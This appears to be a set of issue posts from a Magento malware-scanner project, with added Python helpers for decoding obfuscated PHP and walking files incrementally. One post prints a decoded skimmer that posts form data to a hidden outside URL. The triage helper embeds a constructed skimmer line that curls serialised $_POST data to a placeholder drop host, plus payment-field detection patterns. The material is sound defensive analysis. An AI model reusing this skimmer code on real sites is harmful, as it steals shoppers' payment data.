pkg_resources.DistributionNotFound: requests>=0.8.2

Malware not detected in Cc.php and Mage_Payment_Model_Method_Cc.php

I found this line manually after a deep mwscan:
<?php /*** PHP Encode v1.0 by zeura.com ***/ $XnNhAWEnhoiqwciqpoHH=file(FILE); eval(base64_decode("ENCRYPT...`

When I decrypt the Zeura layer I get the following code at the end of the file:
if(isset($_POST)){$EvxCq = WmJQW('',$_POST,0); $_COOKIE['BMMLN']!=null?$SflHflmRjQ=$_COOKIE['BMMLN']:setcookie('BMMLN', $SflHflmRjQ=time().'-'.crc32(uniqid()),time()+86000,'/',$_SERVER['HTTP_HOST']);file_get_contents(base64_decode( 'aHR0cHM6Ly9sb2NhbHNlcnZlci5ob3N0L2FwaS9pbmRleC5waHA='), FALSE,stream_context_create(array('http'=>array('method'=>'POST', 'header'=>'Content-type: application/x-www-form-urlencoded', 'content'=>http_build_query(array('info'=>base64_encode($EvxCq), 'hostname'=>$_SERVER['HTTP_HOST'],'sub'=>2,'key'=>$SflHflmRjQ))))));} function WmJQW($bRrNN,$CYRnG,$qabbF) {foreach($CYRnG as $vikBC => $PmGhs) {if(!is_array($PmGhs)) { if($qabbF == 1) {$dwTSf[] = $bRrNN.'['.$vikBC.']='.$PmGhs;}else {$dwTSf[] = $vikBC.'='.$PmGhs;} }else {$dwTSf[] = WmJQW($vikBC,$PmGhs,1);}}return implode('&',$dwTSf);} ?>
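The samples reported in this thread, in the functions.php injection above and in the dynamic_base64_function_call false-positive report share one trait: the interesting part (a field-name regex, a drop URL, an obfuscator prologue) sits behind base64_decode('...') or urldecode('%66%67...'). The following is an added triage helper, written for this page and not a mwscan rule or tool, that decodes those literals first and then scores the file, so a copyright-protected extension (an obfuscator prologue and nothing else) can be told apart from a skimmer (payment field names, an outbound URL and a network or exec call together). The two PHP samples are constructed, shaped after the snippets on this page; the URL in them is a placeholder.

```python
"""Decode hidden PHP string literals and score them for exfiltration (added example)."""
import base64
import re
from urllib.parse import unquote

B64_CALL = re.compile(r"base64_decode\s*\(\s*['\"]([A-Za-z0-9+/=\s]+)['\"]\s*\)")
URLDEC_CALL = re.compile(r"urldecode\s*\(\s*['\"]((?:%[0-9A-Fa-f]{2})+)['\"]\s*\)")
NET_FUNCS = re.compile(
    r"\b(curl_init|curl_exec|file_get_contents|shell_exec|fsockopen|mail|stream_context_create)\s*\(")
PAYMENT_WORDS = ('cc_number', 'card_number', 'cvv', 'cvc', 'expiry',
                 'billing', 'payment', 'password', 'login')


def decoded_literals(php: str):
    """Yield (kind, offset, decoded_text) for every decodable literal in the source."""
    for m in B64_CALL.finditer(php):
        raw = re.sub(r'\s+', '', m.group(1))
        try:
            text = base64.b64decode(raw, validate=True).decode('utf-8', 'replace')
        except ValueError:          # binascii.Error is a ValueError: not real base64
            continue
        yield 'base64', m.start(), text
    for m in URLDEC_CALL.finditer(php):
        yield 'urldecode', m.start(), unquote(m.group(1))


def triage(php: str) -> dict:
    """Return decoded literals, the indicators found and a coarse verdict."""
    decoded = list(decoded_literals(php))
    joined = ' '.join(text for _, _, text in decoded).lower()
    indicators = []
    words = sorted(w for w in PAYMENT_WORDS if w in joined)
    if words:
        indicators.append('payment-field names in decoded literal: ' + ', '.join(words))
    urls = re.findall(r'https?://[^\s\'"<>]+', joined)
    if urls:
        indicators.append('decoded URL: ' + ', '.join(urls))
    if re.search(r'serialize\s*\(\s*\$_(POST|COOKIE|REQUEST)', php):
        indicators.append('serialises request data')
    net = sorted(set(NET_FUNCS.findall(php)))
    if net and (urls or words):
        indicators.append('network/exec call alongside hidden data: ' + ', '.join(net))
    if len(indicators) >= 3:
        verdict = 'likely-skimmer'
    elif decoded:
        verdict = 'suspicious'      # obfuscated, but no exfil evidence: human review
    else:
        verdict = 'clean'
    return {'decoded': decoded, 'indicators': indicators, 'verdict': verdict}


def _b64(s: str) -> str:
    return base64.b64encode(s.encode()).decode()


# Constructed sample shaped like the functions.php injection reported above:
# field-name regex and drop URL as base64 literals, exfiltration through curl.
SKIMMER_SAMPLE = (
    "if (preg_match(\"/\".base64_decode('"
    + _b64('firstname|cvc2|cc_number|cvv|expiry|billing|payment|card_number')
    + "').\"/i\", serialize($_POST)))\n"
    "    @shell_exec(\"curl --data \\\"encode=\".base64_encode(serialize($_POST))"
    ".\"\\\" \".trim(base64_decode('" + _b64('http://drop.example.invalid/collect.php')
    + "')).\" > /dev/null 2>&1 &\");\n"
)

# Constructed sample shaped like the commercial-obfuscator prologue from the
# false-positive report: a urldecode'd token and no network activity.
OBFUSCATOR_SAMPLE = (
    "<?php /* This file is protected by copyright law and provided under license. */"
    "$OOO000000=urldecode('%66%67%36%73%62%65%68%70%72%61%34%63%6F%5F%74%6E%64');"
)


if __name__ == '__main__':
    for name, sample in (('skimmer', SKIMMER_SAMPLE), ('obfuscator', OBFUSCATOR_SAMPLE)):
        result = triage(sample)
        print(name, result['verdict'], result['indicators'])
```

In practice the helper is run over the files a YARA hit points at; the decoded literals are what a reviewer needs to decide whether a dynamic_base64 or urldecode rule fired on a skimmer or on a vendor's licence wrapper.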

pip vs yum python

You need to check if Python packages are already installed and managed with yum or apt, instead of re-installing them with pip.
This will break other Python projects.

Burner Domains

Just looking down the list of burner domains - there was one in the corpus/frontend/firebug-detector.html malware that was encrypted. Is it worth adding the decrypted URL in case it's ever used?

I think in the case of the script in the corpus it was: https://lit-beach-26452.herokuapp.com/, with the "lit-beach-26452" bit changing hack-by-hack so "herokuapp.com" could be used in the list of burner domains?

--newer is dangerous?

If I understand it correctly, this can happen:

RULESURL=https://raw.githubusercontent.com/gwillem/magento-malware-scanner/master/build/all-confirmed.yar
RULEFILE=/var/cache/rules.yar
MAGENTO=/var/www/magento
  • Monday 0:00 malware X exists in $MAGENTO
  • Monday 0:00 malware X is not added to $RULESURL
  • Monday 0:10 /usr/bin/curl -s $RULESURL -o $RULEFILE
  • Monday 0:11 mwscan --newonly --rules $RULEFILE $MAGENTO => malware X not found
  • Monday 10:00 @gwillem adds a malware X to $RULESURL
  • Tuesday 0:10 /usr/bin/curl -s $RULESURL -o $RULEFILE
  • Tuesday 0:11 mwscan --newonly --rules $RULEFILE $MAGENTO => malware X not found

This is a problem right?
Or am I missing something?

A possible fix would be to add the version of the all-confirmed.yar to the path of the LAST_RUN_FILE
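Four of the issues above describe the same piece of the scanner, the file walk: the recursive nl/ and en/ symlinks that made mwscan scan httpdocs 80 times, the IOError on a broken symlink under /data/web/backup, the wish for a yara-python wrapper that skips bulky extensions and only scans files newer than the last run, and the --newonly gap just described where a rule added after a file's ctime never sees that file. The following is an added example covering all four, written for this page and not mwscan's own code: directories are deduplicated by (device, inode) so a loop is walked once; dangling links and unreadable paths go to a callback instead of aborting; non-code extensions are dropped before any rule runs; and the last-run reference is keyed by a hash of the rule file, so a rule update forces one full scan. The matcher is left to the caller (yara-python would go there). The directory tree, the state file and the rule hashes in the demo are constructed.

```python
"""Loop-safe, incremental file enumeration for a periodic scan (added example)."""
import errno
import hashlib
import json
import os
import tempfile

SKIP_EXT = {'.jpg', '.jpeg', '.png', '.gif', '.svg', '.sql', '.csv',
            '.gz', '.tgz', '.zip', '.pdf'}


def iter_candidate_files(root, since=0.0, follow_symlinks=True,
                         skip_ext=SKIP_EXT, on_error=None):
    """Yield regular files under root whose ctime is newer than `since`."""
    report = on_error or (lambda path, exc: None)
    seen_dirs = set()
    stack = [root]
    while stack:
        directory = stack.pop()
        try:
            st = os.stat(directory)                     # resolves a link target
        except OSError as exc:
            report(directory, exc)
            continue
        if (st.st_dev, st.st_ino) in seen_dirs:         # loop or alias: walk once
            continue
        seen_dirs.add((st.st_dev, st.st_ino))
        try:
            with os.scandir(directory) as it:
                entries = list(it)
        except OSError as exc:                          # permission denied etc.
            report(directory, exc)
            continue
        for entry in entries:
            try:
                if entry.is_dir(follow_symlinks=follow_symlinks):
                    stack.append(entry.path)
                    continue
                if not entry.is_file(follow_symlinks=follow_symlinks):
                    if follow_symlinks and entry.is_symlink():   # dangling link
                        report(entry.path, OSError(errno.ENOENT, 'dangling symlink'))
                    continue                             # fifo, socket, device ...
                if os.path.splitext(entry.name)[1].lower() in skip_ext:
                    continue
                if entry.stat(follow_symlinks=follow_symlinks).st_ctime <= since:
                    continue                             # unchanged since last run
            except OSError as exc:
                report(entry.path, exc)
                continue
            yield entry.path


def rules_fingerprint(rules_path):
    with open(rules_path, 'rb') as fh:
        return hashlib.sha256(fh.read()).hexdigest()


def load_reference(state_path, rules_hash):
    """Timestamp of the last completed scan made with *these* rules, else 0.0
    (scan everything: the rules changed or there is no history)."""
    try:
        with open(state_path) as fh:
            state = json.load(fh)
    except (OSError, ValueError):
        return 0.0
    return float(state['since']) if state.get('rules_hash') == rules_hash else 0.0


def save_reference(state_path, rules_hash, since):
    with open(state_path, 'w') as fh:
        json.dump({'rules_hash': rules_hash, 'since': since}, fh)


def build_demo_tree():
    """Constructed fixture: two loop links, a dangling link, an image, one PHP file."""
    root = tempfile.mkdtemp(prefix='mwscan-demo-')
    docs = os.path.join(root, 'httpdocs')
    os.makedirs(os.path.join(docs, 'app'))
    with open(os.path.join(docs, 'index.php'), 'w') as fh:
        fh.write('<?php echo 1;')
    with open(os.path.join(docs, 'app', 'logo.png'), 'wb') as fh:
        fh.write(b'\x89PNG')
    os.symlink(docs, os.path.join(docs, 'nl'))          # nl/ => httpdocs/
    os.symlink(docs, os.path.join(docs, 'en'))          # en/ => httpdocs/
    os.symlink(os.path.join(root, 'gone.php'), os.path.join(docs, 'backup.php'))
    return docs


def scan_demo(since=0.0):
    docs = build_demo_tree()
    errors = []
    found = [os.path.relpath(p, docs) for p in iter_candidate_files(
        docs, since=since, on_error=lambda p, e: errors.append(os.path.relpath(p, docs)))]
    return sorted(found), sorted(errors)


def reference_demo():
    state = os.path.join(tempfile.mkdtemp(prefix='mwscan-state-'), 'last_run.json')
    save_reference(state, 'sha256-of-rules-v1', 1000.0)
    return load_reference(state, 'sha256-of-rules-v1'), load_reference(state, 'sha256-of-rules-v2')


if __name__ == '__main__':
    print(scan_demo(), reference_demo())
```

A cron wrapper built on this would compute rules_fingerprint() after each rule download, pass load_reference() as `since`, run the matcher over the yielded paths, and call save_reference() only when the scan finished without a fatal error.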
